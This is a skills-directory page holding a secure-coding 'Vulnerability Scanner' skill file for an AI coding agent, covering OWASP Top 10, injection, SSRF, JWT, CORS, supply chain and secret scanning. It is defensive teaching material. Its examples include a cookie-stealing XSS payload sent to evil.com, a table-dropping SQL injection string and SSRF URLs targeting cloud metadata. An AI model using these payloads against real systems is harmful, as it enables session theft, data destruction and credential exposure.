Back to skills
SKILL.md
Vulnerability Scanner
ASecurityUse when auditing, pen-testing, hardening, and verifying code against vulnerability scanner vulnerabilities, injection vectors, and auth flaws.
- 5 stars
- 0 votes
- 0 copies
- 0 views
- Added September 27, 2026
Works with
Security analysis
96/100- Installs packages at runtime which could introduce malicious dependencies
Pro scans all 2 files and shows the line behind each finding
npx -y skills add Harmitx7/tribunal-kit --skill vulnerability-scanner --agent claude-codeAre you the author of Vulnerability Scanner?
Add the live security badge to your README. It updates with every re-scan.
[](https://www.skillsdirectory.com/skills/harmitx7-vulnerability-scanner)---
name: vulnerability-scanner
description: "Use when auditing, pen-testing, hardening, and verifying code against vulnerability scanner vulnerabilities, injection vectors, and auth flaws."
version: 6.0.0
last-updated: 2026-09-29
skills:
- backend-security-expert
- frontend-security-expert
- api-security-auditor
tools: Read, Grep, Glob, Bash, Edit, Write
scripts-binding:
- .agent/scripts/lint_runner.js
- .agent/scripts/verify_all.js
---
# Vulnerability Scanner β Security Analysis Mastery
## Mandatory Pre-Flight Context Inspection
Before reading, generating, or refactoring code in the `vulnerability-scanner` domain, inspect these 5 critical parameters:
1. **System Boundaries & Dependencies**: Verify that all required dependencies exist in target package manifests and environment paths.
2. **Runtime Context & Platform Invariants**: Confirm target platform constraints (Node.js, Browser, Mobile OS, Edge runtime) before applying APIs.
3. **Execution Guardrails**: Identify potential side-effects, state mutations, and unhandled asynchronous exceptions.
4. **Validation & Type Contracts**: Validate input data schemas and strict type constraints across all module interfaces.
5. **Observability & Proof of Execution**: Ensure execution produces tangible verification signals (terminal output, tests, metrics).
## Activation Boundaries
- **Activate when:** Use when auditing, pen-testing, hardening, and verifying code against vulnerability scanner vulnerabilities, injection vectors, and auth flaws.
- **DO NOT activate when:** The task falls outside the `vulnerability-scanner` domain or is managed by a different dedicated specialist agent.
## π Multi-Pass Execution Protocol
| Pass | Phase | Core Action | Adaptive Depth |
|:---|:---|:---|:---|
| **Pass 1** | **Understand** | Deconstruct the user's explicit objective, implicit requirements, and platform constraints. | Fast / Standard / Deep |
| **Pass 2** | **Plan** | Decompose task into smallest logical steps; map dependencies, affected files, and tool calls. | Standard / Deep |
| **Pass 3** | **Execute** | Implement solution with production-grade craft, zero placeholders, and strict typing. | All Modes |
| **Pass 4** | **Verify** | Run linters, unit tests, or compiler checks to validate structural correctness. | All Modes |
| **Pass 5** | **Attack & Falsify** | Perform adversarial search for edge-case failures, counterexamples, race conditions, and traps. | Standard / Deep |
| **Pass 6** | **Harden** | Eliminate discovered friction, optimize performance, and harden error boundaries. | Standard / Deep |
| **Pass 7** | **Quality Gate** | Enforce Verification-Before-Completion (VBC) with concrete terminal proof before finalizing. | All Modes |
---
## π οΈ Technical Architecture & Reference Recipes
---
## OWASP Top 10 (2025)
```
A01 Broken Access Control β Missing authorization checks
A02 Cryptographic Failures β Weak encryption, exposed secrets
A03 Injection β SQL, XSS, command, LDAP
A04 Insecure Design β Missing threat modeling
A05 Security Misconfiguration β Default credentials, verbose errors
A06 Vulnerable Components β Outdated dependencies
A07 Authentication Failures β Weak passwords, missing MFA
A08 Data Integrity Failures β Untrusted deserialization, missing SRI
A09 Logging & Monitoring Failures β No audit trail, alert blindness
A10 SSRF β Server-side request forgery
```
---
## Injection Attacks
### SQL Injection
```typescript
// β VULNERABLE: String interpolation in SQL
const query = `SELECT * FROM users WHERE email = '${email}'`;
// Attack: email = "'; DROP TABLE users; --"
// β
SAFE: Parameterized queries
const result = await db.query('SELECT * FROM users WHERE email = $1', [email]);
// β
SAFE: ORM (Prisma, Drizzle)
const user = await prisma.user.findUnique({ where: { email } });
// β HALLUCINATION TRAP: Template literals are NOT parameterized
// β db.query(`SELECT * FROM users WHERE id = ${id}`); β VULNERABLE
// β
db.query("SELECT * FROM users WHERE id = $1", [id]); β SAFE
```
### XSS (Cross-Site Scripting)
```typescript
// β VULNERABLE: innerHTML with user input
element.innerHTML = userComment;
// Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
// β
SAFE: textContent (no HTML parsing)
element.textContent = userComment;
// React auto-escapes by default β BUT:
// β VULNERABLE in React:
<div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
// β
SAFE in React:
<div>{userInput}</div> // auto-escaped
// Content Security Policy (defense in depth)
// Add HTTP header:
// Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
```
### SSRF (Server-Side Request Forgery)
```typescript
// β VULNERABLE: fetching user-provided URLs
app.get('/proxy', async (req, res) => {
const data = await fetch(req.query.url).then(r => r.text());
res.send(data);
});
// Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
// Attack: url = "http://localhost:6379/" (internal Redis)
// β
SAFE: Allowlist of domains
const ALLOWED_HOSTS = new Set(['api.example.com', 'cdn.example.com']);
app.get('/proxy', async (req, res) => {
const url = new URL(req.query.url as string);
if (!ALLOWED_HOSTS.has(url.hostname)) {
return res.status(403).json({ error: 'Domain not allowed' });
}
// Additional: block private IP ranges
const ip = await dns.resolve4(url.hostname);
if (isPrivateIP(ip[0])) {
return res.status(403).json({ error: 'Private IP not allowed' });
}
const data = await fetch(url).then(r => r.text());
res.send(data);
});
```
---
## Authentication & Authorization
```typescript
// JWT Best Practices
import jwt from 'jsonwebtoken';
// β
SAFE: Specify algorithm explicitly
const token = jwt.sign(payload, SECRET, {
algorithm: 'HS256', // explicit
expiresIn: '15m', // short-lived access token
issuer: 'myapp',
});
// β
SAFE: Verify with explicit algorithms
const decoded = jwt.verify(token, SECRET, {
algorithms: ['HS256'], // MUST specify β prevents algorithm confusion attack
issuer: 'myapp',
});
// β HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
// β jwt.verify(token, SECRET); β accepts ANY algorithm including "none"
// β
jwt.verify(token, SECRET, { algorithms: ["HS256"] });
// Authorization: check BEFORE business logic
app.delete('/api/posts/:id', async (req, res) => {
const post = await getPost(req.params.id);
if (!post) return res.status(404).json({ error: 'Not found' });
// β
Authorization check BEFORE delete
if (post.authorId !== req.user.id && req.user.role !== 'admin') {
return res.status(403).json({ error: 'Forbidden' });
}
await deletePost(post.id);
res.status(204).send();
});
```
---
## Dependency Security
```bash
# Check for known vulnerabilities
npm audit # built-in
npx snyk test # Snyk (more comprehensive)
npx socket check # Socket.dev (supply chain)
# Auto-fix
npm audit fix
# lock file integrity
# β
Commit package-lock.json / pnpm-lock.yaml
# β
Use npm ci in CI (not npm install)
# β
Pin exact versions for critical dependencies
# β
Enable Dependabot or Renovate for auto-updates
```
```
Supply chain attack vectors:
1. Typosquatting β "recat" instead of "react"
2. Maintainer hijack β compromised npm account
3. Dependency confusion β private package name exists on public registry
4. Malicious postinstall β runs arbitrary code on npm install
5. Abandoned packages β unmaintained, no security patches
Defense:
- Review new dependencies before adding
- Use npm audit in CI (fail on high severity)
- Pin versions, review lockfile diffs
- Use --ignore-scripts for untrusted packages
```
---
## Security Headers
```typescript
import helmet from 'helmet';
app.use(helmet()); // Sets secure defaults
// Key headers set by helmet:
// Content-Security-Policy β Controls resource loading
// X-Content-Type-Options β Prevents MIME sniffing (nosniff)
// X-Frame-Options β Prevents clickjacking (DENY)
// Strict-Transport-Security β Forces HTTPS (HSTS)
// X-XSS-Protection β Legacy XSS filter (deprecated, CSP is better)
// Referrer-Policy β Controls referrer header
// CORS β never wildcard in production
app.use(
cors({
origin: ['https://myapp.com', 'https://admin.myapp.com'],
methods: ['GET', 'POST', 'PUT', 'DELETE'],
credentials: true,
}),
);
// β HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
// β cors({ origin: "*" }) β allows any website to call your API
// β
cors({ origin: ["https://myapp.com"] }) β whitelist specific domains
```
---
## Secret Scanning
```
Secrets that MUST be in environment variables:
- Database connection strings
- API keys (Stripe, SendGrid, etc.)
- JWT signing secrets
- OAuth client secrets
- Encryption keys
Detection tools:
- git-secrets (pre-commit hook)
- TruffleHog / detect-secrets (scan history)
- GitHub secret scanning (automatic)
- GitGuardian (enterprise)
If a secret is committed:
1. IMMEDIATELY rotate the secret (new key/password)
2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
3. Force-push cleaned history
4. Audit access logs for the compromised secret
5. Post-incident review
```
---
## Security Checklists
---
### OWASP Top 10 Audit Checklist
#### A01: Broken Access Control
- [ ] Authorization on all protected routes
- [ ] Deny by default
- [ ] Rate limiting implemented
- [ ] CORS properly configured
#### A02: Cryptographic Failures
- [ ] Passwords hashed (bcrypt/argon2, cost 12+)
- [ ] Sensitive data encrypted at rest
- [ ] TLS 1.2+ for all connections
- [ ] No secrets in code/logs
#### A03: Injection
- [ ] Parameterized queries
- [ ] Input validation on all user data
- [ ] Output encoding for XSS
- [ ] No eval() or dynamic code execution
#### A04: Insecure Design
- [ ] Threat modeling done
- [ ] Security requirements defined
- [ ] Business logic validated
#### A05: Security Misconfiguration
- [ ] Unnecessary features disabled
- [ ] Error messages sanitized
- [ ] Security headers configured
- [ ] Default credentials changed
#### A06: Vulnerable Components
- [ ] Dependencies up to date
- [ ] No known vulnerabilities
- [ ] Unused dependencies removed
#### A07: Authentication Failures
- [ ] MFA available
- [ ] Session invalidation on logout
- [ ] Session timeout implemented
- [ ] Brute force protection
#### A08: Integrity Failures
- [ ] Dependency integrity verified
- [ ] CI/CD pipeline secured
- [ ] Update mechanism secured
#### A09: Logging Failures
- [ ] Security events logged
- [ ] Logs protected
- [ ] No sensitive data in logs
- [ ] Alerting configured
#### A10: SSRF
- [ ] URL validation implemented
- [ ] Allow-list for external calls
- [ ] Network segmentation
---
### Authentication Checklist
- [ ] Strong password policy
- [ ] Account lockout
- [ ] Secure password reset
- [ ] Session management
- [ ] Token expiration
- [ ] Logout invalidation
---
### API Security Checklist
- [ ] Authentication required
- [ ] Authorization per endpoint
- [ ] Input validation
- [ ] Rate limiting
- [ ] Output sanitization
- [ ] Error handling
---
### Data Protection Checklist
- [ ] Encryption at rest
- [ ] Encryption in transit
- [ ] Key management
- [ ] Data minimization
- [ ] Secure deletion
---
### Security Headers
| Header | Purpose |
| ----------------------------- | ---------------- |
| **Content-Security-Policy** | XSS prevention |
| **X-Content-Type-Options** | MIME sniffing |
| **X-Frame-Options** | Clickjacking |
| **Strict-Transport-Security** | Force HTTPS |
| **Referrer-Policy** | Referrer control |
---
### Quick Audit Commands
| Check | What to Look For |
| ------------------ | --------------------------- |
| Secrets in code | password, api_key, secret |
| Dangerous patterns | eval, innerHTML, SQL concat |
| Dependency issues | npm audit, snyk |
---
**Usage:** Copy relevant checklists into your PLAN.md or security report.
## π¨ Edge-Case & Failure Mode Matrix
| Scenario | Risk | Production Mitigation |
|:---|:---|:---|
| **Empty or Null Inputs** | Unhandled exception or unexpected rendering collapse | Enforce fallback guards, optional chaining, and explicit empty state handlers |
| **Network Timeout / Latency** | Hanging operations or duplicate side-effects | Implement bounded abort controllers, exponential backoff, and idempotency keys |
| **Concurrency / Race Conditions** | Stale state overwrite or inconsistent data mutations | Use atomic transactions, mutex locking, or cancel-on-resubmit controls |
| **Invalid Schema / Malformed Payload** | Downstream runtime errors or security injection | Validate boundary payloads with Zod/Pydantic schemas prior to execution |
| **Resource / Memory Saturation** | OOM errors, frame drops, or memory leaks | Clean up listeners, cancel active timers, and enforce pagination/virtualization |
## π€ LLM-Specific Traps Table
| Anti-Pattern | What AI Commonly Does Wrong | What Is Actually Correct |
|:---|:---|:---|
| **Hardcoded Secret Pattern** | Committing API keys, tokens, or private salts into source code | Load credentials strictly via runtime environment variables and secret stores |
| **Prompt Injection Surface** | Directly concatenating untrusted user input into LLM system prompts | Wrap user content in isolated delimiters and strip injection control sequences |
| **Missing Authorization Check** | Relying only on authentication token presence without checking tenant/object RBAC | Verify user permissions against the specific target record ID before mutation |
## ποΈ Tribunal Verification & Guardrails
**Active Reviewers:** `security-auditor` Β· `penetration-tester` Β· `backend-security-expert`
**Slash Command:** `/review` or `/tribunal-full`
### π¬ Evidence Standard (Tri-State Verification)
Every finding, audit statement, or completion claim must classify its factual certainty:
- **`[OBSERVED]`**: Directly confirmed in the codebase or verified via executed terminal command.
- **`[INFERRED]`**: Logically deduced from code patterns, architectural data flow, or schema relations.
- **`[UNVERIFIED]`**: Speculative hypothesis or runtime possibility requiring active testing or measurement.
### β
Pre-Flight Self-Audit Checklist
```
β
Are user inputs sanitized and treated as untrusted data at system boundaries?
β
Are secrets loaded strictly via environment variables with zero hardcoding?
β
Is least-privilege enforcement active on APIs, tokens, and storage buckets?
β
Are prompt-injection delimiters and sanitizers wrapped around LLM inputs?
β
Did I verify encryption in transit and at rest for sensitive data?
```
### π Verification-Before-Completion (VBC) Protocol
**CRITICAL:** You must follow a strict "evidence-based closeout" state machine.
- β **Forbidden:** Declaring a task complete because the output "looks correct."
- β
**Required:** You are explicitly forbidden from finalizing any task without providing **concrete evidence** (terminal output, passing test suites, compiler success, or equivalent operational proof) that your output works as intended.
Files in this skill
- SKILL.md
- scripts/security_scan.py
Attribution
Comments
Loading commentsβ¦